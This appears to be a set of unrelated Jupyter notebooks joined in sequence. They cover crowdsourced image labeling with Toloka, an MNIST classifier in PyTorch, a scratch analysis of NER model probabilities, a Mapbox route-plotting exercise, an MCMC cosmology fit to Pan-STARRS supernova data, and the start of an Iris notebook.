```
pool = toloka_client.create_pool(pool)
```
**Uploading tasks**
Create control tasks. In small pools, control tasks should account for 10–20% of all tasks.
> Control tasks are tasks that already contain the correct response. They are used for checking the quality of responses from performers. The performer's response is compared to the response you provided. If they match, it means the performer answered correctly.
> Make sure to include different variations of correct responses in equal amounts.
To learn more about [creating control tasks](https://toloka.ai/docs/guide/concepts/task_markup.html?utm_source=github&utm_medium=site&utm_campaign=tolokakit), go to the Requester’s Guide.
```
golden_tasks = [
toloka.Task(
pool_id=pool.id,
input_values={'image_url': row.image_url},
known_solutions = [
toloka.task.BaseTask.KnownSolution(
output_values={'value': row.value}
)
],
infinite_overlap=True,
)
for row in golden_dataset.itertuples()
]
```
Create pool tasks
```
tasks = [
toloka.Task(
pool_id=pool.id,
input_values={'image_url': url},
)
for url in main_dataset['image_url']
]
```
Upload tasks
```
created_tasks = toloka_client.create_tasks(golden_tasks + tasks, allow_defaults=True)
print(len(created_tasks.items))
```
You can visit created pool in web-interface and preview tasks and control tasks.
<table align="center">
<tr>
<td>
<img src="./img/performer_interface.png" alt="Possible performer interface">
</td>
</tr>
<tr><td align="center">
<b>Figure 2.</b> Possible performer interface.
</td></tr>
</table>
Start the pool.
**Important.** Remember that real Toloka performers will complete the tasks.
Double check that everything is correct
with your project configuration before you start the pool
```
training = toloka_client.open_training(training.id)
print(f'training - {training.status}')
pool = toloka_client.open_pool(pool.id)
print(f'main pool - {pool.status}')
```
## Receiving responses
Wait until the pool is completed.
```
pool_id = pool.id
def wait_pool_for_close(pool_id, minutes_to_wait=1):
sleep_time = 60 * minutes_to_wait
pool = toloka_client.get_pool(pool_id)
while not pool.is_closed():
op = toloka_client.get_analytics([toloka.analytics_request.CompletionPercentagePoolAnalytics(subject_id=pool.id)])
op = toloka_client.wait_operation(op)
percentage = op.details['value'][0]['result']['value']
logging.info(
f' {datetime.datetime.now().strftime("%H:%M:%S")}\t'
f'Pool {pool.id} - {percentage}%'
)
time.sleep(sleep_time)
pool = toloka_client.get_pool(pool.id)
logging.info('Pool was closed.')
wait_pool_for_close(pool_id)
```
Get responses
When all the tasks are completed, look at the responses from performers.
```
answers = []
for assignment in toloka_client.get_assignments(pool_id=pool.id, status='ACCEPTED'):
for task, solution in zip(assignment.tasks, assignment.solutions):
if not task.known_solutions:
answers.append([task.input_values['image_url'], solution.output_values['value'], assignment.user_id])
print(f'answers count: {len(answers)}')
# Prepare dataframe
answers_df = pandas.DataFrame(answers, columns=['task', 'text', 'performer'])
```
Aggregation results using the ROVER model impemented in [Crowd-Kit](https://github.com/Toloka/crowd-kit#crowd-kit-computational-quality-control-for-crowdsourcing).
```
rover_agg_df = ROVER(tokenizer=lambda x: list(x), detokenizer=lambda x: ''.join(x)).fit_predict(answers_df)
```
Look at the results.
Some preparations for displaying the results
```
images = rover_agg_df.index.values
labels = rover_agg_df.values
start_with = 0
```
Note: The cell below can be run several times.
```
if start_with >= len(rover_agg_df):
logging.info('no more images')
else:
ipyplot.plot_images(
images=images[start_with:],
labels=labels[start_with:],
max_images=8,
img_width=300,
)
start_with += 8
```
**You** can see the labeled images. Some possible results are shown in figure 3 below.
<table align="center">
<tr><td>
<img src="./img/possible_result.png"
alt="Possible results">
</td></tr>
<tr><td align="center">
<b>Figure 3.</b> Possible results.
</td></tr>
</table>
|
github_jupyter
|
# Multi-Layer Perceptron, MNIST
---
In this notebook, we will train an MLP to classify images from the [MNIST database](http://yann.lecun.com/exdb/mnist/) hand-written digit database.
The process will be broken down into the following steps:
>1. Load and visualize the data
2. Define a neural network
3. Train the model
4. Evaluate the performance of our trained model on a test dataset!
Before we begin, we have to import the necessary libraries for working with data and PyTorch.
```
# import libraries
import torch
import numpy as np
```
---
## Load and Visualize the [Data](http://pytorch.org/docs/stable/torchvision/datasets.html)
Downloading may take a few moments, and you should see your progress as the data is loading. You may also choose to change the `batch_size` if you want to load more data at a time.
This cell will create DataLoaders for each of our datasets.
```
# The MNIST datasets are hosted on yann.lecun.com that has moved under CloudFlare protection
# Run this script to enable the datasets download
# Reference: https://github.com/pytorch/vision/issues/1938
from six.moves import urllib
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
from torchvision import datasets
import torchvision.transforms as transforms
# number of subprocesses to use for data loading
num_workers = 0
# how many samples per batch to load
batch_size = 20
# convert data to torch.FloatTensor
transform = transforms.ToTensor()
# choose the training and test datasets
train_data = datasets.MNIST(root='data', train=True,
download=True, transform=transform)
test_data = datasets.MNIST(root='data', train=False,
download=True, transform=transform)
# prepare data loaders
train_loader = torch.utils.data.DataLoader(train_data, batch_size=batch_size,
num_workers=num_workers)
test_loader = torch.utils.data.DataLoader(test_data, batch_size=batch_size,
num_workers=num_workers)
```
### Visualize a Batch of Training Data
The first step in a classification task is to take a look at the data, make sure it is loaded in correctly, then make any initial observations about patterns in that data.
```
import matplotlib.pyplot as plt
%matplotlib inline
# obtain one batch of training images
dataiter = iter(train_loader)
images, labels = dataiter.next()
images = images.numpy()
# plot the images in the batch, along with the corresponding labels
fig = plt.figure(figsize=(25, 4))
for idx in np.arange(20):
ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
# print out the correct label for each image
# .item() gets the value contained in a Tensor
ax.set_title(str(labels[idx].item()))
```
### View an Image in More Detail
```
img = np.squeeze(images[1])
fig = plt.figure(figsize = (12,12))
ax = fig.add_subplot(111)
ax.imshow(img, cmap='gray')
width, height = img.shape
thresh = img.max()/2.5
for x in range(width):
for y in range(height):
val = round(img[x][y],2) if img[x][y] !=0 else 0
ax.annotate(str(val), xy=(y,x),
horizontalalignment='center',
verticalalignment='center',
color='white' if img[x][y]<thresh else 'black')
```
---
## Define the Network [Architecture](http://pytorch.org/docs/stable/nn.html)
The architecture will be responsible for seeing as input a 784-dim Tensor of pixel values for each image, and producing a Tensor of length 10 (our number of classes) that indicates the class scores for an input image. This particular example uses two hidden layers and dropout to avoid overfitting.
```
import torch.nn as nn
import torch.nn.functional as F
# define the NN architecture
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
# number of hidden nodes in each layer (512)
hidden_1 = 512
hidden_2 = 512
# linear layer (784 -> hidden_1)
self.fc1 = nn.Linear(28 * 28, hidden_1)
# linear layer (n_hidden -> hidden_2)
self.fc2 = nn.Linear(hidden_1, hidden_2)
# linear layer (n_hidden -> 10)
self.fc3 = nn.Linear(hidden_2, 10)
# dropout layer (p=0.2)
# dropout prevents overfitting of data
self.dropout = nn.Dropout(0.2)
def forward(self, x):
# flatten image input
x = x.view(-1, 28 * 28)
# add hidden layer, with relu activation function
x = F.relu(self.fc1(x))
# add dropout layer
x = self.dropout(x)
# add hidden layer, with relu activation function
x = F.relu(self.fc2(x))
# add dropout layer
x = self.dropout(x)
# add output layer
x = self.fc3(x)
return x
# initialize the NN
model = Net()
print(model)
```
### Specify [Loss Function](http://pytorch.org/docs/stable/nn.html#loss-functions) and [Optimizer](http://pytorch.org/docs/stable/optim.html)
It's recommended that you use cross-entropy loss for classification. If you look at the documentation (linked above), you can see that PyTorch's cross entropy function applies a softmax funtion to the output layer *and* then calculates the log loss.
```
# specify loss function (categorical cross-entropy)
criterion = nn.CrossEntropyLoss()
# specify optimizer (stochastic gradient descent) and learning rate = 0.01
optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
```
---
## Train the Network
The steps for training/learning from a batch of data are described in the comments below:
1. Clear the gradients of all optimized variables
2. Forward pass: compute predicted outputs by passing inputs to the model
3. Calculate the loss
4. Backward pass: compute gradient of the loss with respect to model parameters
5. Perform a single optimization step (parameter update)
6. Update average training loss
The following loop trains for 50 epochs; take a look at how the values for the training loss decrease over time. We want it to decrease while also avoiding overfitting the training data.
```
# number of epochs to train the model
n_epochs = 50
model.train() # prep model for training
for epoch in range(n_epochs):
# monitor training loss
train_loss = 0.0
###################
# train the model #
###################
for data, target in train_loader:
# clear the gradients of all optimized variables
optimizer.zero_grad()
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# backward pass: compute gradient of the loss with respect to model parameters
loss.backward()
# perform a single optimization step (parameter update)
optimizer.step()
# update running training loss
train_loss += loss.item()*data.size(0)
# print training statistics
# calculate average loss over an epoch
train_loss = train_loss/len(train_loader.dataset)
print('Epoch: {} \tTraining Loss: {:.6f}'.format(
epoch+1,
train_loss
))
```
---
## Test the Trained Network
Finally, we test our best model on previously unseen **test data** and evaluate it's performance. Testing on unseen data is a good way to check that our model generalizes well. It may also be useful to be granular in this analysis and take a look at how this model performs on each class as well as looking at its overall loss and accuracy.
```
# initialize lists to monitor test loss and accuracy
test_loss = 0.0
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
model.eval() # prep model for training
for data, target in test_loader:
# forward pass: compute predicted outputs by passing inputs to the model
output = model(data)
# calculate the loss
loss = criterion(output, target)
# update test loss
test_loss += loss.item()*data.size(0)
# convert output probabilities to predicted class
_, pred = torch.max(output, 1)
# compare predictions to true label
correct = np.squeeze(pred.eq(target.data.view_as(pred)))
# calculate test accuracy for each object class
for i in range(batch_size):
label = target.data[i]
class_correct[label] += correct[i].item()
class_total[label] += 1
# calculate and print avg test loss
test_loss = test_loss/len(test_loader.dataset)
print('Test Loss: {:.6f}\n'.format(test_loss))
for i in range(10):
if class_total[i] > 0:
print('Test Accuracy of %5s: %2d%% (%2d/%2d)' % (
str(i), 100 * class_correct[i] / class_total[i],
np.sum(class_correct[i]), np.sum(class_total[i])))
else:
print('Test Accuracy of %5s: N/A (no training examples)' % (classes[i]))
print('\nTest Accuracy (Overall): %2d%% (%2d/%2d)' % (
100. * np.sum(class_correct) / np.sum(class_total),
np.sum(class_correct), np.sum(class_total)))
```
### Visualize Sample Test Results
This cell displays test images and their labels in this format: `predicted (ground-truth)`. The text will be green for accurately classified examples and red for incorrect predictions.
```
# obtain one batch of test images
dataiter = iter(test_loader)
images, labels = dataiter.next()
# get sample outputs
output = model(images)
# convert output probabilities to predicted class
_, preds = torch.max(output, 1)
# prep images for display
images = images.numpy()
# plot the images in the batch, along with predicted and true labels
fig = plt.figure(figsize=(25, 4))
for idx in np.arange(20):
ax = fig.add_subplot(2, 20/2, idx+1, xticks=[], yticks=[])
ax.imshow(np.squeeze(images[idx]), cmap='gray')
ax.set_title("{} ({})".format(str(preds[idx].item()), str(labels[idx].item())),
color=("green" if preds[idx]==labels[idx] else "red"))
```
|
github_jupyter
|
```
%matplotlib inline
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from scipy import stats
import statsmodels as stm
from os import walk
sns.set(rc={'figure.figsize':(14.7,8.27)})
OxA00=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanUnary_scorestest.npy")
OxC00=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/Mr1mainSalmanCCCtest.npy")
#Dic00 = np.load("/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag00/FinalDict.npy").item()
with open("/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag00/test_spacy.txt", 'r') as file :
TokFil00 = file.read().split('\n\n')
OxC00.shape,OxA00.shape
OxA02=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanUnary_scorestest.npy")
OxC02=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEMr1mainSalmanCCCtest.npy")
Dic02 = np.load("/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag02/NAMEFinalDict02.npy").item()
with open("/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag02/NAMEtest_spacy.txt", 'r') as file :
TokFil02 = file.read().split('\n\n')
OxC02.shape,OxA02.shape
OxA01=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanUnary_scorestest.npy")
OxC01=np.load("NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEMr1mainSalmanCCCtest.npy")
Dic01 = np.load("/home/salman/NeuroNER-master/src/SalmanTest/MyTrain385SeparateRepFlag01/NAMEFinalDict01.npy").item()
with open("/home/salman/NeuroNER-master/data/Speedi/MyTrain385SeparateRepFlag01/NAMEtest_spacy.txt", 'r') as file :
TokFil01 = file.read().split('\n\n')
OxC01.shape,OxA01.shape
filenames = np.load("/home/salman/NeuroNER-master/src/SalmanTest/filenames.npy")
def CleanDic(Dic):
NDic={}
for i in filenames:
if len(Dic[i[:-4]])>=1:
NDic["%s"%i[:-4]] = Dic[i[:-4]]
return(NDic)
#NDic00 = CleanDic(Dic00)
NDic01 = CleanDic(Dic01)
#NDic02 = CleanDic(Dic02)
#NDic11 = CleanDic(Dic11)
#NDic22 = CleanDic(Dic22)
DirectoryPath="/home/salman/NeuroNER-master/data/Speedi/test/MyTrain385SeparateRepFlag01/"
(_, _, RealFilesNames) = next(walk("%s"%DirectoryPath))
RealFilesNames=[i[:-4] for i in RealFilesNames]
def findBreaks(oxc,limit=300):
breaks=[]
for i,c in enumerate(oxc):
if len(c)>limit:
breaks.append(i)
return(breaks)
#C00breaks = findBreaks(OxC00)
C01breaks = findBreaks(OxC01)
#C02breaks = findBreaks(OxC02)
#C11breaks = findBreaks(OxC11)
#C22breaks = findBreaks(OxC22)
len(C00breaks),len(C02breaks),len(C01breaks)
msk=np.array([15, 38, 61, 85])
oldfile = 0
file = 0
Prob00max = []
Prob00sum = []
SN=1
for file in range(len(RealFilesNames)):
insideline = 0
if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:
for i in np.arange(oldfile,C00breaks[file]):
for m,j in enumerate((TokFil00[i].split('\n'))):
for splittt in (j.split(" ")[0].split("^")):
if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \
len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \
(NDic02[RealFilesNames[file]][insideline][SN][0]) in splittt):
try:
TEST=TokFil00[i].split('\n')[m-1].split(" ")[:2]
except:
TEST=TokFil00[i].split('\n')[m+1].split(" ")[:2]
Prob00max.append((((np.exp((np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))),\
i,file,insideline,j.split(" ")[:2],m,TEST))
Prob00sum.append((np.sum((np.exp(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m]))))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
else:
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
oldfile = C00breaks[file] + 1
oldfile = 0
file = 0
Prob02max = []
Prob02sum = []
SN=1
for file in range(len(RealFilesNames)):
insideline = 0
if len(NDic02[RealFilesNames[file]][insideline][SN]) != 0:
for i in np.arange(oldfile,C02breaks[file]):
for m,j in enumerate((TokFil02[i].split('\n'))):
for splittt in (j.split(" ")[0].split("^")):
if (len(NDic02[RealFilesNames[file]][insideline][SN]) != 0 and \
len(NDic02[RealFilesNames[file]][insideline][SN][1]) != 0 and \
((NDic02[RealFilesNames[file]][insideline][SN][1]) in splittt)):
try:
TEST=TokFil02[i].split('\n')[m-1].split(" ")[:2]
except:
TEST=TokFil02[i].split('\n')[m+1].split(" ")[:2]
Prob02max.append((((np.exp((np.max(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m])))))),\
i,file,insideline,j.split(" ")[:2],m,TEST))
Prob02sum.append((np.sum((np.exp(OxA02[i][m][msk])))/(np.sum((np.exp(OxA02[i][m]))))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
else:
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
oldfile = C02breaks[file] + 1
oldfile = 0
file = 0
Prob01max = []
Prob01sum = []
SN=1
for file in range(len(RealFilesNames)):
insideline = 0
if len(NDic01[RealFilesNames[file]][insideline][SN]) != 0:
for i in np.arange(oldfile,C01breaks[file]):
for m,j in enumerate((TokFil01[i].split('\n'))):
for splittt in (j.split(" ")[0].split("^")):
if (len(NDic01[RealFilesNames[file]][insideline][SN]) != 0 and \
len(NDic01[RealFilesNames[file]][insideline][SN][1]) != 0 and \
((NDic01[RealFilesNames[file]][insideline][SN][1] in splittt))):
Prob01max.append((((np.exp((np.max(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m])))))),\
i,file,insideline,j.split(" ")[:2],m,TEST))
Prob01sum.append((np.sum((np.exp(OxA01[i][m][msk])))/(np.sum((np.exp(OxA01[i][m]))))))
if insideline < len(NDic01[RealFilesNames[file]]) - 1:
insideline = insideline + 1
else:
if insideline < len(NDic01[RealFilesNames[file]]) - 1:
insideline = insideline + 1
oldfile = C01breaks[file] + 1
NDic01["227-01"][0][SN][1]
TokFil01[1481].split('\n')
len(Prob00sum),len(Prob02sum),len(Prob01sum)
Dic01["227-03"]
Prob01max[29]
Prob00max[30]
len(NDic02[RealFilesNames[file]][insideline][SN][1])
Dic02["308-01"]
Prob02max
TEST=0
for i in RealFilesNames:
for j in NDic02[i]:
if len(j[SN])!=0:
TEST=TEST+1
TEST
NDic02["221-03"]:
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# This was done because of Dr. name(first entry) and Patient name where the same and made the confussion.
del Prob00max[313]
del Prob00sum[313]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# This is because of the wrong labeling of data!
del Prob00max[355]
del Prob00sum[355]
del Prob00max[354]
del Prob00sum[354]
del Prob00max[353]
del Prob00sum[353]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# This was done because of Dr. name and Patient name where the same and made the confussion.
del Prob00max[389]
del Prob00sum[389]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
# This was done because of Dr. name and Patient name where the same and made the confussion.
del Prob00max[466]
del Prob00sum[466]
del Prob00max[465]
del Prob00sum[465]
len(Prob00sum),len(Prob02sum)
for i in np.arange(730):
if Prob00max[i][4][1]!=Prob02max[i][4][1]:
print(i)
break
TotProbMax00 = [i[0] for i in Prob00max]
TotProbMax01 = [i[0] for i in Prob01max]
TotProbMax02 = [i[0] for i in Prob02max]
sns.set_style('darkgrid')
sns.distplot(TotProbMax00,label="SN unchanged MAX",norm_hist=True)#,bins=100)
sns.distplot(TotProbMax01,label="SN random from inside MAX",norm_hist=True)#,bins=100)
sns.distplot(TotProbMax02,label="SN random from outside MAX",norm_hist=True)#,bins=100)
#sns.distplot(Prob00sum,label="GN & SN unchanged sum",norm_hist=True)
#sns.distplot(Prob01sum,label="SN random from inside sum",norm_hist=True)
#sns.distplot(Prob02sum,label="SN random from outside sum",norm_hist=True)
plt.legend()
sns.set_style('darkgrid')
sns.distplot(np.array(TotProbMax00),label="SN unchanged MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(TotProbMax01,label="SN random from inside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(TotProbMax02,label="SN random from outside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(Prob00sum,label="SN unchanged sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(Prob01sum,label="SN random from inside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(Prob02sum,label="SN random from outside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
plt.legend()
sns.set_style('darkgrid')
sns.distplot(1 - np.array(TotProbMax00),label="SN unchanged MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(TotProbMax01),label="SN random from inside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(TotProbMax02),label="SN random from outside MAX",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(Prob00sum),label="SN unchanged sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(Prob01sum),label="SN random from inside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
sns.distplot(1 - np.array(Prob02sum),label="SN random from outside sum",\
hist_kws=dict(cumulative=True),kde_kws=dict(cumulative=True))
plt.legend()
OxC00[3]
file=2
insideline=0
GN=0
SN=1
NDic02[RealFilesNames[file]]#[insideline][SN]
for i in np.arange(C00breaks[file-1]+1,C00breaks[file]):
for m,j in enumerate((TokFil00[i].split('\n'))):
if (j.split(" ")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):
print((np.sum((np.exp(OxA00[i][m][msk]))/(np.sum((np.exp(OxA00[i][m])))))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):
for m,j in enumerate((TokFil00[i].split('\n'))):
if (j.split(" ")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):
print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))
if insideline < len(NDic02[RealFilesNames[file]]) - 1:
insideline = insideline + 1
for n,i in enumerate(np.arange(C00breaks[file-1]+1,C00breaks[file])):
for m,j in enumerate((TokFil00[i].split('\n'))):
if (j.split(" ")[0] == NDic02[RealFilesNames[file]][insideline][SN][0]):
print((np.exp(np.max(OxA00[i][m][msk])))/(np.sum((np.exp(OxA00[i][m])))))
```
|
github_jupyter
|
# A Cartographers Expedition
You and your friends have decided to tackle NYC old school! No cell phones or GPS devices allowed. Although everyone is a bit nervous, you realize that using an actual map might be pretty cool.
Your goal is to generate a map that plots your between five and six locations in the city. Plotly Express and Mapbox should be used to plot the route (point A to point B to point C) for the expedition.
## Import the required libraries and dependencies
```
import pandas as pd
import plotly.express as px
import os
from pathlib import Path
from dotenv import load_dotenv
```
## Step 1: Create a .env file to hold your Mapbox API Access Token
## Step 2: Read in the Mapbox API access token using the `os.getenv` function. Use the function provided to confirm that the token is available for use in the program. Finally, set your Mapbox API access token as the parameter in the `px.set_mapbox_access_token` function.
```
# Set up API credentials
# Read the Mapbox API access token
# YOUR CODE HERE
# Confirm that the mapbox_api_access_token is available
if not mapbox_api_access_token:
print("Error with the Mapbox API access token. Check the .env file.")
# Set the Mapbox API access token
# YOUR CODE HERE
```
## Step 3: Read in the `nyc_excursion_plans.csv` file in to a Pandas DataFrame. Drop any rows that contain missing data or NaN values.
```
# Read the the ny_places_interest.csv file into a DataFrame
places_of_interest = # YOUR CODE HERE
# Review the DataFrame
# YOUR CODE HERE
```
## Step 4: Slice the DataFrame to include the arrive airport and first location
```
# Create a DataFrame with the arriving Airport and the first location you will visit
arrival_and_first_location = # YOUR CODE HERE
# Plot the arriving airport and the first location
first_route = # YOUR CODE HERE
# Show the plot
# YOUR CODE HERE
```
## Step 5: Plot the route between your first, second and thrid locations.
```
# Plot the route between the first second and third locations
first_second_third_locations = # YOUR CODE HERE
# Create the plot including your first, second and third locations
second_route = # YOUR CODE HERE
# Show the Plot
# YOUR CODE HERE
```
## Step 6: Plot the route between your third, fourth, and fifth locations.
```
## Step 5: Plot the route between your third, fourth, and fifth locations.
third_fourth_fifth_locations = # YOUR CODE HERE
# Create the plot including your third, fourth and fifth locations
third_route = # YOUR CODE HERE
# Show the Plot
# YOUR CODE HERE
```
## Step 7: Plot all the stops in your excursion
```
# Plot course for all of the stops in your excursion, including the airport
all_stops = # YOUR CODE HERE
# Create the plot that shows all of you stops
plot_all_stops = # YOUR CODE HERE
# Show the Plot
# YOUR CODE HERE
```
**Question** Given the location of the stops on your excursion, what is the order in which you should visit them to get you back to the airport most efficiently?
**Answer** # YOUR ANSWER HERE
|
github_jupyter
|
```
import emcee
import pandas as pd
import numpy as np
from scipy import stats
import chainconsumer
import matplotlib.pyplot as plt
from scipy.integrate import quad
from chainconsumer import ChainConsumer
plt.rc('font', size=15) # controls default text sizes
plt.rc('axes', titlesize=15) # fontsize of the axes title
plt.rc('axes', labelsize=15) # fontsize of the x and y labels
plt.rc('xtick', labelsize=12) # fontsize of the tick labels
plt.rc('ytick', labelsize=12) # fontsize of the tick labels
plt.rc('legend', fontsize=12) # legend fontsize
%config InlineBackend.figure_format = 'svg'
data_pd = pd.read_csv("hlsp_ps1cosmo_panstarrs_gpc1_all_model_v1_lcparam-full.txt",sep=' ',usecols=[0,1,2,3,4,5])
z = data_pd['zhel'].astype(np.float)
dz = data_pd['dz'].astype(np.float)
muB = data_pd['mb'].astype(np.float)
dmuB = data_pd['dmb'].astype(np.float)
data = {}
data['z'] = z
data['dz'] = dz
data['muB'] = muB
data['dmuB'] = dmuB
plt.rcParams['figure.figsize'] = [20, 12] # set plotsize
plt.rcParams.update({'font.size': 22}) # set fontsize
fig,ax = plt.subplots(1,1)
xlim = (0, 2)
ylim = (13, 27)
#xlabel = r"$z$"
#ylabel = r"$\mu_{B}$"
ax.errorbar(x=z,y=muB,xerr=dz,yerr=dmuB,linestyle='None')
ax.set_xlim(xlim)
ax.set_ylim(ylim)
leg = ax.legend(loc='lower right')
ax.set_xlabel('Redshift (z)')
ax.set_ylabel('Distance modulus (mu)')
ax.set_title('Distance modulus vs redshift for Type 1a SNe ')
def get_default_parameters(update=None):
pars = {}
pars['omega_m'] = 0.3
pars['omega_L'] = 0.7
pars['omega_K'] = 0.0
pars['h'] = 0.72
pars['w'] = -1.
if update is not None:
pars.update(update)
return pars
def get_starting_point(name_list):
sp = {}
sp['omega_m'] = 0.24
sp['omega_L'] = 0.74
sp['omega_K'] = 0.0
sp['h'] = 0.65
sp['w'] = -1.
return np.array([sp[x] for x in name_list])
def get_latex_names(name_list):
latex_names = {}
latex_names['omega_m'] = '$\Omega_m$'
latex_names['omega_L'] = '$\Omega_L$'
latex_names['omega_K'] = '$\Omega_K$'
latex_names['h'] = '$h$'
latex_names['w'] = '$w$'
return [latex_names[x] for x in name_list]
#constraints on the parameter values
parameter_limits={
'omega_m' : [0., 1.],
'omega_L' : [0., 1.],
'omega_K' : [0., 0.], #Flat Universe
'h' : [.2, 1.],
'w' : [-1., -1.] #Lambda CDM
}
def log_prior(pars, names):
count = 0
for name in names:
limits = parameter_limits[name]
low, high = limits[0], limits[1]
if pars[name]<low or pars[name]>high:
count+=1
if count!=0:
return -np.inf
else:
prior = 0
prior += ((pars['h']-0.6766)/0.0042)**2 #Planck h gaussian
prior += ((pars['omega_m']-0.315)/0.007)**2 #Planck Omega_m gaussian
return prior
def log_likelihood(fit_par_values, fit_par_names, flat):
# f_gas data
z, muB, dmuB = data['z'], data['muB'], data['dmuB']
pars = get_default_parameters()
for par_value, par_name in zip(fit_par_values, fit_par_names):
pars[par_name] = par_value
if not np.isfinite(log_prior(pars, fit_par_names)):
return -np.inf
else:
log_likelihood = 0.
if flat==True:
pars['omega_L'] = 1 - pars['omega_m']
pars['omega_K'] = 0.
else:
pars['omega_K'] = 1 - pars['omega_m'] - pars['omega_K']
for z_i, muB_i, dmuB_i in zip(z,muB,dmuB):
muB_model = mu_model(z_i, pars)
log_likelihood +=((muB_i-muB_model)**2)/(dmuB_i)**2
return -log_likelihood - log_prior(pars, fit_par_names)
def E_z(z, pars):
omega_m = pars['omega_m']
omega_L = pars['omega_L']
omega_K = 0
w = pars['w']
EoS = (1+z)**(3*(1+w))
return np.sqrt(omega_m*(1+z)**3 + omega_L*EoS + omega_K*(1+z)**2)
def one_over_E_z(z, pars):
return 1/E_z(z, pars)
def d_l(z, pars):
#scale hubble paramter
H0 = pars['h']*100
#speed of light
c = 299792.458 # c in km/s
#integrate for DL based on the given values of paratmers
integral = quad(one_over_E_z, 0.01, z, args=(pars))[0]
factor =c/(H0*(1+z))
return factor*integral
def mu_model(z, pars):
return 5*np.log10(d_l(z,pars))+25
def run_mcmc(fit_par_names, flat=True):
pars = get_default_parameters()
starting_point = get_starting_point(fit_par_names)
std = 0.2*starting_point
ndim = len(fit_par_names)
nwalkers = 32
p0 = emcee.utils.sample_ball(starting_point, std, size=nwalkers)
sampler = emcee.EnsembleSampler(nwalkers, ndim, log_likelihood, args=[fit_par_names,flat])
sampler.run_mcmc(p0, 20000, progress=True);
samples = sampler.get_chain(discard=10000, flat=True)
if flat==True and 'omega_m' in fit_par_names:
#print('first one')
samples_new = np.column_stack((1-samples[:,0], samples))
elif flat==False and 'omega_m' in fit_par_names:
#print('second one')
try:
samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-
samples[:,fit_par_names.index('omega_L')], samples))
except:
samples_new = np.column_stack((1-samples[:,fit_par_names.index('omega_m')]-
pars['omega_L'], samples))
else:
samples_new = samples
return samples_new
fit_par_names = ['omega_m', 'h']
chain = run_mcmc(fit_par_names, flat=True)
par_names_latex = get_latex_names(['omega_L']+fit_par_names)
c = ChainConsumer().add_chain(chain, parameters=par_names_latex).configure(statistics="max", summary=True,usetex=False)
fig = c.plotter.plot()
```
|
github_jupyter
|
# 붓꽃(Iris) 품종 데이터 예측하기
<h1>Table of Contents<span class="tocSkip"></span></h1>
